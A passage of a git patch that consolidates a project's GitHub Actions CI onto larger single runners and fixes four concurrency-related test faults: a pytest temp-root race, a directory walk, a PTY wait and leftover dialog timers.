${(r.ms / 1000).toFixed(1).padStart(6)}s ${r.unit.pkg} :: ${r.unit.script}`, + ) + } + + if (failed.length > 0) { + for (const r of failed) console.error(`::error::${r.unit.pkg} :: ${r.unit.script} failed`) + console.error(`::error::${failed.length} of ${results.length} checks failed`) + process.exit(1) + } + console.log(`\nall ${results.length} checks passed`) +} + +await main() diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index e2660cc4a6..caf4e2d3cb 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -38,7 +38,7 @@ jobs: detect: name: Detect affected areas runs-on: ubuntu-latest - timeout-minutes: 10 + timeout-minutes: 1 outputs: python: ${{ steps.classify.outputs.python }} python_prod: ${{ steps.classify.outputs.python_prod }} @@ -61,6 +61,8 @@ jobs: id: classify uses: ./.github/actions/detect-changes with: + sparse-checkout: scripts/ci/classify_changes.py + sparse-checkout-cone-mode: false github-token: ${{ github.token }} # ───────────────────────────────────────────────────────────────────── @@ -72,8 +74,6 @@ jobs: needs: detect if: needs.detect.outputs.python == 'true' uses: ./.github/workflows/tests.yml - with: - slice_count: 12 # macOS + Windows lanes. The main `tests` lane above is Linux-only, and # the OS-marked tests it collects are skipped there by design (see the diff --git a/.github/workflows/docker.yml b/.github/workflows/docker.yml index 8c259fe872..f245708486 100644 --- a/.github/workflows/docker.yml +++ b/.github/workflows/docker.yml @@ -76,12 +76,14 @@ jobs: matrix: include: - arch: amd64 - runner: ubuntu-latest + runner: ubuntu-latest-32-core platform: linux/amd64 cache-from: type=gha,scope=docker-amd64 cache-to: type=gha,mode=max,scope=docker-amd64 + # arm64 builds on the native arm64 larger runner. A build of + # linux/arm64 on an x64 host uses emulation. - arch: arm64 - runner: ubuntu-24.04-arm + runner: ubuntu-latest-32-arm-core platform: linux/arm64 cache-from: type=gha,scope=docker-arm64 cache-to: type=gha,mode=max,scope=docker-arm64 @@ -169,7 +171,11 @@ jobs: OPENAI_API_KEY: "" NOUS_API_KEY: "" run: | - scripts/run_tests.sh tests/docker/ --file-timeout 600 + # Each of these tests drives a container, so the docker daemon sets + # the limit and not the processor. This caps the workers. The + # default from run_tests.sh is cpu_count*2, which starts 64 + # containers together on the 32-core amd64 runner. + HERMES_TEST_WORKERS=$(nproc) scripts/run_tests.sh tests/docker/ --file-timeout 600 # --------------------------------------------------------------------------- # Rebuild and push each architecture only after the unprivileged build/test @@ -184,12 +190,13 @@ jobs: matrix: include: - arch: amd64 - runner: ubuntu-latest + runner: ubuntu-latest-32-core platform: linux/amd64 cache-from: type=gha,scope=docker-amd64 cache-to: type=gha,mode=max,scope=docker-amd64 + # Native arm64 for the same reason as the build matrix above. - arch: arm64 - runner: ubuntu-24.04-arm + runner: ubuntu-latest-32-arm-core platform: linux/arm64 cache-from: type=gha,scope=docker-arm64 cache-to: type=gha,mode=max,scope=docker-arm64 diff --git a/.github/workflows/e2e-desktop.yml b/.github/workflows/e2e-desktop.yml index 2749e7c290..8692f05d7a 100644 --- a/.github/workflows/e2e-desktop.yml +++ b/.github/workflows/e2e-desktop.yml @@ -17,7 +17,10 @@ concurrency: jobs: e2e: name: Playwright E2E (Linux) - runs-on: ubuntu-latest + # This job builds the renderer and the electron bundle, then drives a real + # Electron app under xvfb. vite, tsc and the Playwright workers all scale + # with the core count. + runs-on: ubuntu-latest-32-core timeout-minutes: 20 outputs: review_status: ${{ steps.review-status.outputs.review_status }} diff --git a/.github/workflows/js-tests.yml b/.github/workflows/js-tests.yml index 9631cdd7fa..956908293c 100644 --- a/.github/workflows/js-tests.yml +++ b/.github/workflows/js-tests.yml @@ -5,87 +5,17 @@ on: workflow_call: jobs: - workspaces: - name: List npm workspaces - runs-on: ubuntu-latest - timeout-minutes: 20 - outputs: - checks: ${{ steps.set-matrix.outputs.checks }} - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4 - with: - node-version: 26 - cache: npm - - - name: grab npm 12 - run: | - # No-op once the bundled npm is already 12.x — saves ~5-15s/job and - # keeps the installed major aligned with the npm12 cache-key tag. - npm --version | grep -q '^12\.' || npm i -g npm@12 - - # ``setup-node``'s ``cache: npm`` only caches the ~/.npm tarball cache; - # every job still re-extracts the full workspace node_modules and reruns - # postinstalls (including the Electron binary fetch). Cache the installed - # tree itself, keyed on the lockfile, and skip ``npm ci`` on an exact - # hit. No restore-keys: a partial hit would leave a stale tree, so - # anything but an exact lockfile match reinstalls from scratch. - # The discovery job installs with --ignore-scripts, so its tree differs - # from the check jobs' — hence the distinct ``-noscripts`` key. - - name: Restore node_modules - id: node-modules-cache - uses: actions/cache@0400d5f644dc74513175e3cd8d07132dd4860809 # v4.2.4 - with: - path: | - node_modules - apps/*/node_modules - ui-tui/node_modules - ui-tui/packages/*/node_modules - tests-js/node_modules - web/node_modules - key: node-modules-noscripts-${{ runner.os }}-node26-npm12-${{ hashFiles('package-lock.json') }} - - - uses: ./.github/actions/retry - if: steps.node-modules-cache.outputs.cache-hit != 'true' - with: - command: npm ci --ignore-scripts - - id: set-matrix - run: | - node -e ' - const { execSync } = require("child_process"); - const pkgs = JSON.parse(execSync("npm query .workspace", { encoding: "utf-8" })); - if (pkgs.length === 0) { - console.error("::error::Workspace discovery produced an empty package list — refusing to emit a zero-length matrix (would skip all JS/TS checks silently)."); - process.exit(1); - } - const checks = []; - for (const pkg of pkgs) { - const scripts = pkg.scripts || {}; - const subs = Object.keys(scripts).filter(s => /^check:.+$/.test(s)); - if (subs.length > 0) { - for (const script of subs) { - checks.push({ package: pkg.location, script }); - } - } else if (scripts.check) { - checks.push({ package: pkg.location, script: "check" }); - } - } - if (checks.length === 0) { - console.error("::error::No check scripts found in any workspace package."); - process.exit(1); - } - process.stdout.write("checks=" + JSON.stringify(checks) + "\n"); - ' >> "$GITHUB_OUTPUT" - check: - name: ${{ matrix.package }} / ${{ matrix.script }} - needs: workspaces - runs-on: ubuntu-latest - timeout-minutes: 20 - strategy: - matrix: - include: ${{ fromJson(needs.workspaces.outputs.checks) }} - fail-fast: false # report all failures, not just the first one + name: JS & TS checks + # One 32-core job replaces a 14-leg matrix. The matrix spread about 612s + # of check payload over 4-core runners. It paid about 371s of repeated + # setup to do it: 14 checkouts, 14 node installs, 14 node_modules + # restores. + # + # One larger runner installs one time. vitest, tsc and eslint each size + # their own worker pool from the core count. + runs-on: ubuntu-latest-32-core + timeout-minutes: 30 steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4 @@ -99,12 +29,21 @@ jobs: # keeps the installed major aligned with the npm12 cache-key tag. npm --version | grep -q '^12\.' || npm i -g npm@12 - # Same rationale as the discovery job's cache above, but this ``npm ci`` - # runs WITH install scripts, so the tree includes postinstall artifacts - # (electron's postinstall unpacks its binary into node_modules/electron/ - # dist, which lives inside the cached tree — the ~/.cache/electron - # download cache is deliberately NOT cached: with npm ci skipped on hit - # it would never be read, only inflate the archive). + # The ``cache: npm`` option of ``setup-node`` caches only the ~/.npm + # tarball cache. The job then extracts the full workspace node_modules + # again and runs the postinstalls again, which includes the Electron + # binary fetch. This caches the installed tree itself, keyed on the + # lockfile, and skips ``npm ci`` on an exact hit. There are no + # restore-keys: a partial hit leaves a stale tree, so anything other + # than an exact lockfile match reinstalls from the start. + # + # This install runs WITH scripts, so the tree holds the postinstall + # artifacts. The postinstall of electron unpacks its binary into + # node_modules/electron/dist, which is inside the cached tree. + # + # The ~/.cache/electron download cache stays out of the key on purpose. + # ``npm ci`` is skipped on a hit, so nothing reads that cache. It only + # makes the archive larger. - name: Restore node_modules id: node-modules-cache uses: actions/cache@0400d5f644dc74513175e3cd8d07132dd4860809 # v4.2.4 @@ -122,4 +61,23 @@ jobs: if: steps.node-modules-cache.outputs.cache-hit != 'true' with: command: npm ci - - run: npm run --prefix ${{ matrix.package }} ${{ matrix.script }} + + # Every check runs at the same time. The step fails only after all of + # them finish. There are two reasons this is not ``npm run --ws check``. + # + # * ``--ws`` is serial and stops at the first workspace that fails. A + # run then reports one failure, where the matrix this replaced + # reported every failure together. + # * The unit of work is a CHECK, and not a workspace. apps/desktop is + # most of the payload, and its own ``check`` is a serial && chain. + # A spread across workspaces alone leaves that chain as the long + # pole. This expands the ``check:*`` sub-scripts of a package, so + # its lint, ui, electron and plugin suites all run together. That + # is the same selection rule the old matrix job used. + # + # Discovery is ``npm query .workspace``. A new package or a new + # ``check:*`` script needs no change here. An empty list is an error and + # not an empty run, because an empty run reports green after it checks + # nothing. + - name: Run all workspace checks + run: node .github/scripts/run-workspace-checks.mjs diff --git a/.github/workflows/nix.yml b/.github/workflows/nix.yml index 23627cbc9f..ccd47d1b09 100644 --- a/.github/workflows/nix.yml +++ b/.github/workflows/nix.yml @@ -51,8 +51,10 @@ jobs: needs: [detect] if: needs.detect.outputs.nix == 'true' # The build compiles the package and its whole dependency closure, so this - # is minutes and not seconds when the cache misses. - runs-on: ubuntu-latest + # takes minutes and not seconds when the cache misses. `nix flake check` + # builds 21 checks, and --max-jobs defaults to the core count. It uses the + # wider runner with no more configuration. + runs-on: ubuntu-latest-32-core timeout-minutes: 60 steps: - name: Checkout code diff --git a/.github/workflows/rust-tests.yml b/.github/workflows/rust-tests.yml index 0d6c179f05..5c91e1a352 100644 --- a/.github/workflows/rust-tests.yml +++ b/.github/workflows/rust-tests.yml @@ -27,7 +27,10 @@ concurrency: jobs: bootstrap-installer: name: cargo test (bootstrap installer) - runs-on: ubuntu-latest + # cargo builds codegen units and test binaries in parallel across the + # cores. This lane also builds the crate from the start when Cargo.toml + # changes. + runs-on: ubuntu-latest-32-core timeout-minutes: 30 defaults: run: diff --git a/.github/workflows/tests-os.yml b/.github/workflows/tests-os.yml index 9ac89c20f4..12719a853c 100644 --- a/.github/workflows/tests-os.yml +++ b/.github/workflows/tests-os.yml @@ -16,9 +16,9 @@ name: OS-specific tests # # Deliberately NOT sliced. The marked set is small (tens of tests, not # thousands), so one plain ``pytest`` process per OS is both faster and far -# less machinery than the LPT-sliced per-file runner the Linux lane needs. +# less machinery than the per-file parallel runner the Linux lane uses. # If either lane grows past its timeout, that is the signal to reach for -# scripts/run_tests.sh --slice here too. +# scripts/run_tests.sh here too. # # Each lane FAILS when it selects zero tests (pytest exit code 5). Without # that guard, a renamed marker or a bad selector would report a green job @@ -48,7 +48,7 @@ jobs: runner: macos-latest marker: macos_only - name: Windows-only tests - runner: windows-latest + runner: windows-latest-32-core marker: windows_only steps: - name: Checkout code diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml index a79bf08563..7286abf6a8 100644 --- a/.github/workflows/tests.yml +++ b/.github/workflows/tests.yml @@ -2,11 +2,6 @@ name: Tests on: workflow_call: - inputs: - slice_count: - description: Number of parallel test slices - type: number - default: 8 permissions: contents: read @@ -17,42 +12,17 @@ concurrency: cancel-in-progress: true jobs: - generate: - name: "Generate slices" - runs-on: ubuntu-latest - timeout-minutes: 10 - outputs: - matrix: ${{ steps.matrix.outputs.matrix }} - steps: - - name: Checkout code - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - - - name: Restore duration cache - uses: actions/cache/restore@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5.0.5 - with: - path: test_durations.json - key: test-durations - # Saves use test-durations-${run_id}, so the exact key above never - # matches — without this prefix fallback the cache ALWAYS missed, - # LPT slicing ran on no data, and unbalanced slices pushed heavy - # files toward the per-file timeout under load. - restore-keys: | - test-durations- - - - name: Generate test slices - id: matrix - run: | - MATRIX=$(python3 scripts/run_tests_parallel.py --generate-slices ${{ inputs.slice_count }}) - echo "matrix=$MATRIX" >> "$GITHUB_OUTPUT" - test: - name: Run tests slice ${{ matrix.slice.index }}/${{ inputs.slice_count }} - needs: generate - runs-on: ubuntu-latest + name: Run tests + # One 96-core runner for the whole suite. There is no slicing. Slicing + # existed to spread the suite over 4-core runners. It cost a matrix job, a + # duration cache, a per-slice artifact and a merge job to do it. + # + # 96 cores clear the floor that the slowest single test file sets (about + # 82s). A second slice divides work that is already at that floor, and + # adds a second setup. + runs-on: ubuntu-latest-96-core timeout-minutes: 30 - strategy: - fail-fast: false - matrix: ${{ fromJSON(needs.generate.outputs.matrix) }} steps: - name: Checkout code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 @@ -117,73 +87,30 @@ jobs: # re-download, keeping the persisted cache small and fast to restore. run: uv cache prune --ci - - name: Run tests (slice ${{ matrix.slice.index }}/${{ inputs.slice_count }}) + - name: Run tests # Per-file isolation via scripts/run_tests.sh: each test file runs # in its own freshly-spawned `python -m pytest ` subprocess # with bounded parallelism. No xdist, no shared workers, no # module-level state leakage between files. # - # File list is pre-computed by the generate job (--generate-slices) - # which runs LPT distribution once and passes the file list to each - # matrix job via --files. Previously each job re-discovered files and - # re-ran LPT independently — redundant N times. + # No --files: the runner discovers the suite itself. The discovered + # set is identical to the list the removed matrix job used to pass in. run: | source .venv/bin/activate - scripts/run_tests.sh --files '${{ matrix.slice.files }}' + scripts/run_tests.sh env: + # This is the maximum number of test FILES that run together. + # run_tests_parallel.py starts one pytest subprocess for each file + # from a single ThreadPoolExecutor, so this value IS the limit. The + # default is cpu_count*2, which is 192 here. + # + # A later commit sets this from a sweep on the real runner. + HERMES_TEST_WORKERS: 144 # Ensure tests don't accidentally call real APIs OPENROUTER_API_KEY: "" OPENAI_API_KEY: "" NOUS_API_KEY: "" - - name: Upload per-slice durations - # Advisory artifact (feeds slice balancing) — a transient artifact- - # service blip must not fail an otherwise-green test slice. - continue-on-error: true - uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7.0.1 - with: - name: test-durations-slice-${{ matrix.slice.index }} - path: test_durations.json - retention-days: 1 - - # Merge per-slice duration data into a single cache, so future runs - # (including PRs) get balanced slicing. - save-durations: - needs: test - if: needs.test.result == 'success' && github.ref == 'refs/heads/main' - runs-on: ubuntu-latest - timeout-minutes: 10 - steps: - - name: Download all slice durations - # Each slice uploads the same file name (test_durations.json). - # With merge-multiple, the parallel downloads write to one path. - # This causes two problems: a race can write two JSON documents - # into one file, and the last write erases the other slices. - # Without merge-multiple, each artifact gets its own directory. - uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1 - with: - pattern: test-durations-slice-* - path: durations - - - name: Merge into single durations file - run: | - python3 -c " - import json, glob, os - merged = {} - for f in glob.glob('durations/*/test_durations.json'): - with open(f) as fh: - merged.update(json.load(fh)) - with open('test_durations.json', 'w') as fh: - json.dump(merged, fh, indent=2, sort_keys=True) - print(f'Merged {len(merged)} file durations') - " - - - name: Save merged duration cache - uses: actions/cache/save@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5.0.5 - with: - path: test_durations.json - key: test-durations-${{ github.run_id }} - e2e: runs-on: ubuntu-latest timeout-minutes: 15 diff --git a/apps/desktop/package.json b/apps/desktop/package.json index ef1a9f6d16..73a71ed35a 100644 --- a/apps/desktop/package.json +++ b/apps/desktop/package.json @@ -66,14 +66,12 @@ "test:find-in-page-native": "electron electron/find-in-page-native-fixture", "test": "vitest run", "preview": "node scripts/assert-root-install.mjs && vite preview --host 127.0.0.1 --port 4174", + "check:test:ui": "npm run test:ui", "check:test:desktop:platforms": "npm run test:desktop:platforms", - "check:test:plugins": "node --test src/plugins/*/tests/*.test.mjs", - "check:test:ui:shard-1of3": "node scripts/run-ui-shard.mjs", - "check:test:ui:shard-2of3": "node scripts/run-ui-shard.mjs", - "check:test:ui:shard-3of3": "node scripts/run-ui-shard.mjs", "check:test:desktop:all": "npm run test:desktop:all", + "check:test:plugins": "node --test src/plugins/*/tests/*.test.mjs", "check:lint": "npm run typecheck && npm run lint", - "check": "npm run check:lint && npm run test:ui && npm run test:desktop:platforms && npm run test:desktop:all", + "check": "npm run check:lint && npm run test:ui && npm run test:desktop:platforms && npm run test:desktop:all && npm run check:test:plugins", "test:e2e": "npm run build && playwright test e2e/", "test:e2e:visual": "npm run build && WLR_BACKENDS=headless WLR_NO_HARDWARE_CURSORS=1 cage -- npx playwright test e2e/ --reporter=list", "test:e2e:update-snapshots": "npm run build && WLR_BACKENDS=headless WLR_NO_HARDWARE_CURSORS=1 cage -- npx playwright test e2e/ --reporter=list --update-snapshots", diff --git a/apps/desktop/scripts/run-ui-shard.mjs b/apps/desktop/scripts/run-ui-shard.mjs deleted file mode 100644 index 8f29f16f62..0000000000 --- a/apps/desktop/scripts/run-ui-shard.mjs +++ /dev/null @@ -1,61 +0,0 @@ -// Runs one shard of the UI vitest suite, deriving the shard index/count from -// the npm script NAME (npm_lifecycle_event), so the name and the flag can -// never disagree. A copy-paste slip like "check:test:ui:shard-2of3" running -// --shard=1/3 would silently skip a third of the suite while CI stays green; -// deriving from the name makes that impossible. -// -// It also validates that this package.json declares exactly the shard family -// 1..M for a single M, so a partial 3→4 migration (adding shard-4of4 without -// updating the siblings) fails loudly instead of dropping coverage. -import { spawnSync } from 'node:child_process' -import { readFileSync } from 'node:fs' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' - -const SHARD_RE = /^check:test:ui:shard-(\d+)of(\d+)$/ - -const scriptName = process.env.npm_lifecycle_event ?? '' -const match = scriptName.match(SHARD_RE) -if (!match) { - console.error( - `run-ui-shard: must be invoked via an npm script named check:test:ui:shard-of (got ${JSON.stringify(scriptName)})`, - ) - process.exit(1) -} -const [, indexRaw, countRaw] = match -const index = Number(indexRaw) -const count = Number(countRaw) -if (!(index >= 1 && index <= count)) { - console.error(`run-ui-shard: shard index ${index} out of range 1..${count}`) - process.exit(1) -} - -// The whole family must be exactly 1..M of one M — otherwise a rename or a -// partial count bump leaves a silently untested slice of the suite. -const pkgDir = dirname(dirname(fileURLToPath(import.meta.url))) -const pkg = JSON.parse(readFileSync(join(pkgDir, 'package.json'), 'utf8')) -const family = Object.keys(pkg.scripts ?? {}) - .map((name) => name.match(SHARD_RE)) - .filter(Boolean) -const counts = new Set(family.map((m) => Number(m[2]))) -const indices = family.map((m) => Number(m[1])).sort((a, b) => a - b) -const expected = Array.from({ length: count }, (_, i) => i + 1) -if (counts.size !== 1 || indices.length !== count || indices.some((v, i) => v !== expected[i])) { - console.error( - `run-ui-shard: shard scripts must form exactly 1..M for a single M; found indices [${indices}] with counts {${[...counts]}}`, - ) - process.exit(1) -} - -// Delegate through test:ui so the vitest command stays single-sourced. -// npm resolves to npm.cmd on Windows, which needs a shell (same handling as -// test-desktop.mjs and stage-native-deps.mjs). -const result = spawnSync( - 'npm', - ['run', 'test:ui', '--', `--shard=${index}/${count}`, ...process.argv.slice(2)], - { stdio: 'inherit', cwd: pkgDir, shell: process.platform === 'win32' }, -) -if (result.error) { - console.error(`run-ui-shard: ${result.error.message}`) -} -process.exit(result.status ?? 1) From 969094e4d22d86d2f3fc1a18964db9824721b1d2 Mon Sep 17 00:00:00 2001 From: ethernet Date: Sat, 22 Aug 2026 01:14:14 -0400 Subject: [PATCH 115/161] fix(tests): remove four shared-state and lifetime faults at high concurrency The suite now runs as one job with high per-file concurrency. Four tests depend on state that they share with their siblings, or on a timer that outlives them. That was safe at 8 workers. It is not safe at 96 or more. Runs 32547184159 and 32551746525 show them. 1. Every pytest subprocess shared one temp root. pytest puts tmp_path under /pytest-of-/. At the end of a session it walks that directory with cleanup_dead_symlinks(). The walk lists the directory. Then it asks whether the `pytest-current` symlink resolves. Then it unlinks the symlink. A second process replaces that symlink between the question and the unlink. The first process then raises FileNotFoundError after all of its tests passed. Two files failed this way and passed on retry. scripts/run_tests_parallel.py now gives each subprocess its own temp root through PYTEST_DEBUG_TEMPROOT, and deletes it after the attempt. No two processes share a directory. The race has no shared object to act on. Proof: a direct driver of _pytest.pathlib.cleanup_dead_symlinks against one root, with a second thread that replaces the symlink, raises the same FileNotFoundError on 'pytest-current' as CI. A private root for each subprocess removes that condition. A separate check confirms that 5 subprocesses receive 5 distinct roots, that tmp_path lands inside the private root, and that no root survives the attempt. 2. The config read guard walked directories that other tests were writing. tests/hermes_cli/test_config_read_guard.py scanned the tree with rglob. rglob descends into every directory and filters after that, so it calls scandir() on __pycache__ trees that the guard never inspects. Sibling processes create and delete those entries during the run. A directory that disappears in the middle of a walk raises FileNotFoundError out of rglob. The scan now uses os.walk. It prunes excluded directories before it descends, and it ignores a directory that disappears. __pycache__ joins the excluded set, because bytecode is not source. The guard still catches what it exists to catch. With a planted raw yaml.safe_load of config.yaml in hermes_cli/, the test fails and names the planted file. With a clean tree it passes. 3. A PTY test waited for a file to exist, and not for its content. tests/tools/test_process_registry_write_stdin_surrogates.py spawns a child that runs open(out,'wb').write(sys.stdin.buffer.readline()). open() creates the file empty. The bytes arrive only after the PTY delivers the line. The wait stopped at out.exists(), which the empty file already satisfies, so the read returned b'' when the parent won that gap. This test failed both attempts in CI, and did not pass on retry. The test now waits for the expected bytes, with a bounded deadline. Proof: the old wait loses 6 times in 25 runs on an idle 16-core machine. The new wait loses 0 times in 25. 4. A dialog close timer outlived the test that started it. ConfirmDialog holds the "done" beat for 600ms after a successful confirm, then calls onClose. The timer had no cleanup, so an unmount inside that window left it armed. It then called onClose on a tree that is gone, which reaches setState in the parent. vitest can tear the environment down first, and React then reads `window` during the update: ReferenceError: window is not defined at resolveUpdatePriority (react-dom-client.development.js:1308) at dispatchSetState at Timeout.t4 [as _onTimeout] session-actions-menu.tsx:574 The frame at session-actions-menu.tsx:574 is the `onClose` prop of DeleteSessionDialog. The owner of the timer is ConfirmDialog, which now keeps the handle in a ref and clears it on unmount. Zoomable had the same fault, with a 1500ms timer that clears a "copied" flag. copy-button.tsx and tooltip.tsx already clear their timers. Proof: a new test confirms, unmounts inside the 600ms window, then advances the clock. Against the old code it fails with "expected onClose to not be called at all, but actually been called 1 times". Against the new code it passes. Verification: - The affected Python files and the tests of the runner itself pass under scripts/run_tests.sh. - The desktop ui suite passes: 566 files, 5382 tests, and no "window is not defined". - eslint reports 0 errors on apps/desktop. The 118 warnings are the state before this change. The two cleanup effects carry an eslint-disable line for the ref-mirror rule. They write a timer handle, and not a mirror of a reactive value. The rule permits this, and its own comment names the case. - The PTY test cannot run on the NixOS development machine. That machine has no python3 outside the nix store, and the test uses the literal `python3`. The child exits 127 there. The fix rests on the 25-run measurement above and on CI. --- .../ui/confirm-dialog-unmount.test.tsx | 65 +++++++++++++++++++ .../src/components/ui/confirm-dialog.tsx | 24 ++++++- apps/desktop/src/components/ui/zoomable.tsx | 26 +++++++- scripts/run_tests_parallel.py | 31 ++++++++- tests/hermes_cli/test_config_read_guard.py | 30 +++++++-- ...process_registry_write_stdin_surrogates.py | 22 ++++++- 6 files changed, 185 insertions(+), 13 deletions(-) create mode 100644 apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx diff --git a/apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx b/apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx new file mode 100644 index 0000000000..e797b35abe --- /dev/null +++ b/apps/desktop/src/components/ui/confirm-dialog-unmount.test.tsx @@ -0,0 +1,65 @@ +import { cleanup, fireEvent, render, screen } from '@testing-library/react' +import { afterEach, expect, test, vi } from 'vitest' + +import { ConfirmDialog } from '@/components/ui/confirm-dialog' + +afterEach(cleanup) + +vi.mock('@/i18n', () => ({ + useI18n: () => ({ + t: { + common: { cancel: 'Cancel', confirm: 'Confirm', delete: 'Delete', done: 'Done', loading: 'Working' }, + errors: { genericFailure: 'Something failed' } + } + }) +})) + +// ConfirmDialog schedules window.setTimeout(onClose, 600) after a successful +// confirm. The timer had no cleanup, so an unmount inside that window left it +// pending. In CI it came due after the environment was gone. The setState +// path of React then touched `window`: +// +// ReferenceError: window is not defined +// at resolveUpdatePriority (react-dom-client.development.js:1308) +// at dispatchSetState +// at Timeout.t4 [as _onTimeout] session-actions-menu.tsx:574 +// +// The frame at session-actions-menu.tsx:574 is the `onClose` prop of +// DeleteSessionDialog. The owner of the timer is this component. +// +// This test confirms, unmounts inside the 600ms window, and then lets the +// timer come due on the dead tree. +test('the close timer does not fire after unmount', async () => { + vi.useFakeTimers() + const onClose = vi.fn() + const onConfirm = vi.fn() + + render( + + ) + + fireEvent.click(screen.getByRole('button', { name: 'Delete' })) + + // Not waitFor: it polls on real timers, and the fake timers of this test + // never let it advance. onConfirm runs synchronously inside the click, and + // one microtask turn is enough for the await in run() to settle and reach + // the setTimeout. + await Promise.resolve() + await Promise.resolve() + expect(onConfirm).toHaveBeenCalled() + + // Unmount while the close timer is still pending. + cleanup() + + // Let the timer come due on the unmounted tree. + vi.advanceTimersByTime(1000) + + expect(onClose).not.toHaveBeenCalled() + vi.useRealTimers() +}) diff --git a/apps/desktop/src/components/ui/confirm-dialog.tsx b/apps/desktop/src/components/ui/confirm-dialog.tsx index 9e30011b8e..3792ff41ce 100644 --- a/apps/desktop/src/components/ui/confirm-dialog.tsx +++ b/apps/desktop/src/components/ui/confirm-dialog.tsx @@ -58,6 +58,7 @@ export function ConfirmDialog({ }: ConfirmDialogProps) { const { t } = useI18n() const confirmRef = useRef(null) + const closeTimerRef = useRef(null) const [status, setStatus] = useState<'done' | 'idle' | 'saving'>('idle') const [error, setError] = useState(null) const busy = status === 'saving' || status === 'done' @@ -73,6 +74,24 @@ export function ConfirmDialog({ } }, [open]) + // Cancel the pending close timer on unmount. The timer below holds the + // "done" beat visible for 600ms, and an unmount inside that window used to + // leave it armed. It then called onClose on a tree that is gone, which + // reaches setState in the parent. Under vitest the environment can be torn + // down first, and React then reads `window` during the update and throws + // ReferenceError. + // The write below is a timer handle, and not a mirror of a reactive value. + // It happens on unmount only, and it clears the handle this component owns. + // eslint-disable-next-line no-restricted-syntax + useEffect(() => { + return () => { + if (closeTimerRef.current !== null) { + window.clearTimeout(closeTimerRef.current) + closeTimerRef.current = null + } + } + }, []) + async function run() { if (busy) { return @@ -96,7 +115,10 @@ export function ConfirmDialog({ try { await onConfirm() setStatus('done') - window.setTimeout(onClose, 600) + closeTimerRef.current = window.setTimeout(() => { + closeTimerRef.current = null + onClose() + }, 600) } catch (err) { setStatus('idle') setError(err instanceof Error ? err.message : t.errors.genericFailure) diff --git a/apps/desktop/src/components/ui/zoomable.tsx b/apps/desktop/src/components/ui/zoomable.tsx index 7741022b91..46aed953c0 100644 --- a/apps/desktop/src/components/ui/zoomable.tsx +++ b/apps/desktop/src/components/ui/zoomable.tsx @@ -1,6 +1,6 @@ 'use client' -import { type ReactNode, useEffect, useState } from 'react' +import { type ReactNode, useEffect, useRef, useState } from 'react' import { Dialog, DialogContent } from '@/components/ui/dialog' import { Tip } from '@/components/ui/tooltip' @@ -117,6 +117,22 @@ function Toolbar({ zoomOut: () => void }) { const [copied, setCopied] = useState(false) + const resetRef = useRef(null) + + // Same reason as the close timer of ConfirmDialog. An unmount inside the + // 1500ms window used to leave this armed. The callback then called setState + // on a tree that is gone. + // The write below is a timer handle, and not a mirror of a reactive value. + // It happens on unmount only, and it clears the handle this component owns. + // eslint-disable-next-line no-restricted-syntax + useEffect(() => { + return () => { + if (resetRef.current !== null) { + window.clearTimeout(resetRef.current) + resetRef.current = null + } + } + }, []) const copy = async () => { if (!onCopy) { @@ -125,7 +141,13 @@ function Toolbar({ await onCopy() setCopied(true) - window.setTimeout(() => setCopied(false), 1500) + if (resetRef.current !== null) { + window.clearTimeout(resetRef.current) + } + resetRef.current = window.setTimeout(() => { + resetRef.current = null + setCopied(false) + }, 1500) } return ( diff --git a/scripts/run_tests_parallel.py b/scripts/run_tests_parallel.py index 96bec3c56a..eb923cc9b4 100755 --- a/scripts/run_tests_parallel.py +++ b/scripts/run_tests_parallel.py @@ -45,8 +45,10 @@ import argparse import json import os import re +import shutil import subprocess import sys +import tempfile import threading import time from concurrent.futures import ThreadPoolExecutor, Future @@ -379,7 +381,27 @@ def _run_one_file_once( ) -> Tuple[Path, int, str, dict[str, int], float]: """Single attempt of a per-file pytest subprocess (see _run_one_file).""" cmd = [sys.executable, "-m", "pytest", str(file), *pytest_args] - + + # Give this subprocess its own pytest temp root. + # + # pytest builds its tmp_path root as /pytest-of-/. At the + # end of a session it walks that directory with cleanup_dead_symlinks(). + # The walk lists the directory. Then it asks whether the `pytest-current` + # symlink resolves. Then it unlinks the symlink. + # + # Every file shared one root. A second process replaced that symlink + # between the question and the unlink. The first process then died with + # FileNotFoundError after all of its tests passed. + # + # The risk grows with the number of processes that finish together. At 8 + # workers it never occurred. At 144 workers it occurs. + # + # One root for each subprocess removes the shared directory that the race + # needs. The parent deletes the root after the attempt. + env = os.environ.copy() + temproot = tempfile.mkdtemp(prefix="hermes-pytest-tmproot-") + env["PYTEST_DEBUG_TEMPROOT"] = temproot + subproc_start = time.monotonic() # launch the pytest process proc = subprocess.Popen( @@ -388,7 +410,7 @@ def _run_one_file_once( stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, encoding="utf-8", errors="replace", - env=os.environ, + env=env, # POSIX: place the child at the head of its own process group so # _kill_tree can SIGKILL the group atomically. # Windows: this maps to CREATE_NEW_PROCESS_GROUP in CPython 3.12+; @@ -432,6 +454,11 @@ def _run_one_file_once( _kill_tree(proc, pgid=pgid) output += "\n" + finally: + # Delete the temp root for this attempt. Nothing reads it after the + # subprocess exits. More than 3000 of them fill the disk of the + # runner over one suite. + shutil.rmtree(temproot, ignore_errors=True) if rc == 5: # No tests collected in THIS file — legitimate per-file: a diff --git a/tests/hermes_cli/test_config_read_guard.py b/tests/hermes_cli/test_config_read_guard.py index 02e2414650..d54ea08e4e 100644 --- a/tests/hermes_cli/test_config_read_guard.py +++ 